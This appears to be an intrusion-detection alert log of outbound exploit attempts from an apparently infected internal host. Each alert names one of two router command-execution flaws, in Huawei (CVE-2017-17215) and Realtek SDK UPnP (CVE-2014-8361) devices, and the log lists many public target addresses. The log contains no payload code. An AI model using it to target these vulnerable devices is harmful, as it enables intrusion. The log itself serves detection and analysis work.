                                      07/20/24-23:01:00.647694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5986237215192.168.2.23197.92.38.185
                                      07/20/24-23:01:44.700808TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3629652869192.168.2.23103.218.156.193
                                      07/20/24-23:01:52.934726TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613963452869192.168.2.2379.195.50.112
                                      07/20/24-23:01:24.589249TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614472652869192.168.2.23111.38.32.209
                                      07/20/24-23:01:42.304767TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3478652869192.168.2.23219.196.66.69
                                      07/20/24-23:02:01.645031TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3997652869192.168.2.23201.63.23.173
                                      07/20/24-23:01:42.313122TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23523052869192.168.2.23134.135.7.1
                                      07/20/24-23:01:53.625100TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3750452869192.168.2.23179.230.186.151
                                      07/20/24-23:01:31.977603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5801437215192.168.2.23197.133.236.43
                                      07/20/24-23:01:31.979565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4099237215192.168.2.2341.60.50.103
                                      07/20/24-23:01:41.156801TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4484652869192.168.2.23216.159.149.17
                                      07/20/24-23:02:09.321968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5538052869192.168.2.23221.3.151.48
                                      07/20/24-23:01:04.766644TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615751252869192.168.2.23151.194.118.37
                                      07/20/24-23:01:06.975117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3294237215192.168.2.23157.197.13.210
                                      07/20/24-23:01:08.626717TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25924452869192.168.2.2323.225.3.54
                                      07/20/24-23:01:51.275864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4209652869192.168.2.23200.222.88.102
                                      07/20/24-23:01:00.635367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4479237215192.168.2.23139.13.89.177
                                      07/20/24-23:01:44.280820TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25268652869192.168.2.23182.81.116.37
                                      07/20/24-23:01:49.775041TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613679252869192.168.2.2341.172.236.0
                                      07/20/24-23:01:31.991336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4120037215192.168.2.23184.160.174.234
                                      07/20/24-23:01:45.270636TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25577452869192.168.2.2331.234.118.120
                                      07/20/24-23:01:31.317668TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4831652869192.168.2.23177.181.36.106
                                      07/20/24-23:01:42.758824TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3501052869192.168.2.23213.132.50.155
                                      07/20/24-23:01:01.799480TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616047052869192.168.2.2325.158.237.150
                                      07/20/24-23:01:50.093097TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4055452869192.168.2.2338.110.137.130
                                      07/20/24-23:01:24.944299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4662637215192.168.2.23157.132.44.64
                                      07/20/24-23:01:03.120339TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5905052869192.168.2.234.72.134.93
                                      07/20/24-23:01:41.360712TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615596452869192.168.2.23113.116.9.186
                                      07/20/24-23:01:42.430595TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615259252869192.168.2.2390.133.16.151
                                      07/20/24-23:01:54.345402TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614809652869192.168.2.2393.193.20.196
                                      07/20/24-23:01:43.078618TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5104252869192.168.2.23207.164.129.53
                                      07/20/24-23:01:48.901809TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3425252869192.168.2.2367.14.83.223
                                      07/20/24-23:01:03.149410TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613442452869192.168.2.23208.190.62.115
                                      07/20/24-23:02:07.552669TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5426052869192.168.2.2323.130.194.51
                                      07/20/24-23:01:43.425298TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614868652869192.168.2.23162.125.127.147
                                      07/20/24-23:01:11.639230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4233237215192.168.2.2341.135.159.113
                                      07/20/24-23:01:45.458332TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3549052869192.168.2.23147.65.114.30
                                      07/20/24-23:01:27.658221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3489637215192.168.2.23197.88.10.152
                                      07/20/24-23:01:24.934977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081637215192.168.2.23197.197.41.106
                                      07/20/24-23:01:58.055688TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3359852869192.168.2.2389.139.237.174
                                      07/20/24-23:01:51.107223TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615657252869192.168.2.2342.135.139.61
                                      07/20/24-23:01:24.885895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4963437215192.168.2.23197.238.40.139
                                      07/20/24-23:01:42.729311TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4975852869192.168.2.23130.96.13.171
                                      07/20/24-23:01:10.996987TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613966652869192.168.2.2327.116.111.15
                                      07/20/24-23:01:41.478929TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4826852869192.168.2.2362.0.251.178
                                      07/20/24-23:01:24.933370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219237215192.168.2.23197.181.95.82
                                      07/20/24-23:01:48.433265TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5524452869192.168.2.23153.55.136.220
                                      07/20/24-23:01:24.877747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501837215192.168.2.23157.87.189.85
                                      07/20/24-23:01:21.915268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4207437215192.168.2.23197.207.172.207
                                      07/20/24-23:01:41.303669TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614999252869192.168.2.23152.188.24.161
                                      07/20/24-23:01:27.654172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3720037215192.168.2.23157.251.237.127
                                      07/20/24-23:01:42.000471TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5619652869192.168.2.23199.90.7.168
                                      07/20/24-23:00:57.221280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4312637215192.168.2.23197.4.26.126
                                      07/20/24-23:01:53.560520TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4968852869192.168.2.23175.53.167.172
                                      07/20/24-23:01:27.650969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5475237215192.168.2.23157.247.9.98
                                      07/20/24-23:01:45.096837TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3994652869192.168.2.23145.21.134.81
                                      07/20/24-23:01:54.880741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5223852869192.168.2.23167.225.20.24
                                      07/20/24-23:01:06.973541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4900437215192.168.2.23197.9.136.124
                                      07/20/24-23:01:31.321188TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25747652869192.168.2.23157.108.156.75
                                      07/20/24-23:01:42.557694TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25370652869192.168.2.23185.161.24.118
                                      07/20/24-23:01:42.147980TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25600052869192.168.2.23221.157.224.96
                                      07/20/24-23:00:59.211046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4632637215192.168.2.23157.222.120.169
                                      07/20/24-23:01:50.188348TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615104052869192.168.2.23178.64.121.40
                                      07/20/24-23:01:42.778817TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24074652869192.168.2.23138.229.180.34
                                      07/20/24-23:02:03.159117TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23873052869192.168.2.23183.120.27.200
                                      07/20/24-23:01:07.033766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6062437215192.168.2.2341.252.100.49
                                      07/20/24-23:01:02.047411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4531237215192.168.2.2371.112.242.82
                                      07/20/24-23:02:05.786490TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24447252869192.168.2.23190.159.104.180
                                      07/20/24-23:02:12.682460TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615834052869192.168.2.2385.40.245.195
                                      07/20/24-23:02:14.650164TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3572852869192.168.2.23159.226.32.12
                                      07/20/24-23:01:40.286738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5634237215192.168.2.23157.218.32.62
                                      07/20/24-23:01:45.574617TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23965652869192.168.2.23152.70.166.60
                                      07/20/24-23:01:20.131339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4595237215192.168.2.23197.186.193.196
                                      07/20/24-23:01:41.263056TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613823652869192.168.2.23114.149.101.121
                                      07/20/24-23:00:59.192052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405637215192.168.2.23158.165.91.44
                                      07/20/24-23:01:46.453936TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3499452869192.168.2.2396.24.157.5
                                      07/20/24-23:01:34.062277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5342837215192.168.2.23197.222.250.183
                                      07/20/24-23:01:02.104572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4644037215192.168.2.2341.205.220.16
                                      07/20/24-23:01:34.048825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4140837215192.168.2.235.82.172.149
                                      07/20/24-23:01:43.209467TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4390652869192.168.2.23180.49.147.96
                                      07/20/24-23:01:59.292118TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5855252869192.168.2.23159.133.17.143
                                      07/20/24-23:00:59.196993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665037215192.168.2.23110.243.142.209
                                      07/20/24-23:01:02.965900TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614498652869192.168.2.2384.150.128.0
                                      07/20/24-23:01:59.188717TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5017252869192.168.2.23143.107.137.70
                                      07/20/24-23:01:03.153933TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613466452869192.168.2.23146.210.17.240
                                      07/20/24-23:01:04.155095TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615017852869192.168.2.23218.228.206.146
                                      07/20/24-23:01:42.745651TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613606052869192.168.2.2347.244.160.188
                                      07/20/24-23:01:03.482119TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3578452869192.168.2.23103.18.195.93
                                      07/20/24-23:01:08.615260TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23678652869192.168.2.23201.250.207.152
                                      07/20/24-23:01:45.547334TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25995452869192.168.2.2323.210.80.134
                                      07/20/24-23:01:47.062116TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3392052869192.168.2.2374.191.12.65
                                      07/20/24-23:00:57.220899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4078837215192.168.2.23157.147.238.186
                                      07/20/24-23:01:08.578727TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24838052869192.168.2.23122.204.212.245
                                      07/20/24-23:01:42.262355TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3477852869192.168.2.23137.218.170.227
                                      07/20/24-23:01:43.211007TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4649052869192.168.2.23136.80.115.81
                                      07/20/24-23:00:57.221504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223237215192.168.2.23197.155.27.254
                                      07/20/24-23:01:01.810641TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5976452869192.168.2.23188.112.254.56
                                      07/20/24-23:01:07.005156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705237215192.168.2.2341.148.208.60
                                      07/20/24-23:01:43.906354TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24365252869192.168.2.23207.223.163.108
                                      07/20/24-23:01:52.686542TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3526252869192.168.2.2395.85.24.175
                                      07/20/24-23:01:55.481754TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5709252869192.168.2.23163.119.42.207
                                      07/20/24-23:01:27.653586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3369037215192.168.2.23192.80.253.11
                                      07/20/24-23:01:34.044717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834237215192.168.2.2320.226.9.160
                                      07/20/24-23:01:42.677814TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4463252869192.168.2.23219.196.203.133
                                      07/20/24-23:01:08.565561TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23401652869192.168.2.23193.135.58.157
                                      07/20/24-23:01:41.456455TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613825452869192.168.2.23208.138.181.205
                                      07/20/24-23:01:24.915904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4721437215192.168.2.23157.8.72.36
                                      07/20/24-23:01:59.234149TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4435452869192.168.2.2396.1.75.175
                                      07/20/24-23:01:08.556804TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23430652869192.168.2.23205.32.150.55
                                      07/20/24-23:01:32.046185TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3723037215192.168.2.23197.57.153.94
                                      07/20/24-23:01:42.677814TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24463252869192.168.2.23219.196.203.133
                                      07/20/24-23:01:20.096752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4787237215192.168.2.23157.134.165.10
                                      07/20/24-23:01:42.780168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4135652869192.168.2.23187.139.238.2
                                      07/20/24-23:01:52.019772TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5977652869192.168.2.23221.117.11.208
                                      07/20/24-23:01:50.128003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4027852869192.168.2.2342.169.174.111
                                      07/20/24-23:01:50.949008TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5982052869192.168.2.23216.9.135.122
                                      07/20/24-23:01:56.925238TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25386652869192.168.2.23132.12.76.39
                                      07/20/24-23:01:02.104571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4671837215192.168.2.2341.221.247.167
                                      07/20/24-23:01:44.470424TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614017252869192.168.2.2363.251.2.20
                                      07/20/24-23:02:00.062043TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5277252869192.168.2.2334.24.67.79
                                      07/20/24-23:01:14.095462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5512237215192.168.2.23190.39.12.159
                                      07/20/24-23:01:34.050672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176637215192.168.2.2341.95.161.232
                                      07/20/24-23:01:52.038833TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614601452869192.168.2.2387.75.190.2
                                      07/20/24-23:01:53.068033TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613944652869192.168.2.23109.27.210.57
                                      07/20/24-23:01:42.213822TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4315452869192.168.2.23163.18.131.94
                                      07/20/24-23:01:42.800757TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3440452869192.168.2.23157.252.110.127
                                      07/20/24-23:01:02.389453TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4013852869192.168.2.2349.39.36.55
                                      07/20/24-23:01:20.169339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4545837215192.168.2.23223.241.109.88
                                      07/20/24-23:01:31.328855TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24795852869192.168.2.2362.157.173.255
                                      07/20/24-23:01:42.789220TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4043852869192.168.2.23148.205.165.15
                                      07/20/24-23:01:04.058922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4887437215192.168.2.2341.42.19.221
                                      07/20/24-23:00:57.222164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5779637215192.168.2.23197.249.133.131
                                      07/20/24-23:01:31.974907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5066437215192.168.2.2341.6.200.253
                                      07/20/24-23:01:27.653309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4931837215192.168.2.23124.111.25.252
                                      07/20/24-23:01:51.113661TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25815252869192.168.2.23118.190.106.207
                                      07/20/24-23:02:43.182629TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4505452869192.168.2.23124.204.221.162
                                      07/20/24-23:01:58.751560TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614374852869192.168.2.23210.49.56.86
                                      07/20/24-23:01:42.653653TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4014252869192.168.2.2358.31.233.114
                                      07/20/24-23:01:45.104633TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5865652869192.168.2.2365.50.132.254
                                      07/20/24-23:01:42.672378TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4031052869192.168.2.2347.91.11.144
                                      07/20/24-23:01:42.509003TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614318452869192.168.2.23113.209.32.105
                                      07/20/24-23:01:44.631925TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24236252869192.168.2.2332.163.145.253
                                      07/20/24-23:01:02.515992TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5202652869192.168.2.23186.94.179.5
                                      07/20/24-23:01:08.594120TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3945452869192.168.2.23117.27.97.229
                                      07/20/24-23:01:45.775798TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3285252869192.168.2.2334.116.171.252
                                      07/20/24-23:01:27.749737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4474837215192.168.2.2386.228.82.71
                                      07/20/24-23:01:42.507489TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4182052869192.168.2.2318.194.44.24
                                      07/20/24-23:01:10.684338TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5470252869192.168.2.23190.111.169.67
                                      07/20/24-23:01:02.374539TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5489052869192.168.2.2325.0.169.170
                                      07/20/24-23:01:41.513792TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614726252869192.168.2.23112.201.119.160
                                      07/20/24-23:01:43.047922TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23529252869192.168.2.23219.196.66.69
                                      07/20/24-23:01:44.839991TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613815052869192.168.2.2325.245.127.235
                                      07/20/24-23:02:48.060990TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613308052869192.168.2.2343.238.238.121
                                      07/20/24-23:01:04.053604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5438037215192.168.2.23157.20.58.103
                                      07/20/24-23:01:24.867858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5235837215192.168.2.23157.156.232.12
                                      07/20/24-23:01:42.280418TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615117452869192.168.2.2390.145.205.177
                                      07/20/24-23:01:45.547334TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3766252869192.168.2.23185.111.137.113
                                      07/20/24-23:02:04.052371TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615210052869192.168.2.23104.143.173.10
                                      07/20/24-23:01:01.458734TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4103452869192.168.2.23193.14.204.18
                                      07/20/24-23:01:42.280419TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614011452869192.168.2.23192.160.62.15
                                      07/20/24-23:01:08.590937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3412452869192.168.2.23196.57.233.80
                                      07/20/24-23:01:45.060540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4563052869192.168.2.2378.233.35.58
                                      07/20/24-23:01:47.840364TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5436252869192.168.2.23129.40.249.193
                                      07/20/24-23:01:43.164529TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616032252869192.168.2.23192.101.61.62
                                      07/20/24-23:01:08.668802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5295852869192.168.2.23184.77.18.239
                                      07/20/24-23:01:08.613165TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25736452869192.168.2.23144.0.5.154
                                      07/20/24-23:01:24.883172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974637215192.168.2.23111.144.175.212
                                      07/20/24-23:01:52.735812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4176052869192.168.2.23158.249.141.193
                                      07/20/24-23:01:44.878540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4279852869192.168.2.23184.50.158.70
                                      07/20/24-23:01:34.050313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4996237215192.168.2.23157.34.203.66
                                      07/20/24-23:01:10.770014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5696252869192.168.2.23112.132.188.245
                                      07/20/24-23:01:43.135090TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614549052869192.168.2.2350.90.160.227
                                      07/20/24-23:01:45.053180TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5121652869192.168.2.2374.211.16.76
                                      07/20/24-23:01:44.787907TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4358052869192.168.2.23199.182.118.208
                                      07/20/24-23:01:45.053180TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24265052869192.168.2.23101.184.157.141
                                      07/20/24-23:01:08.572556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5358452869192.168.2.23172.32.160.159
                                      07/20/24-23:01:47.902509TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5086852869192.168.2.2348.202.169.141
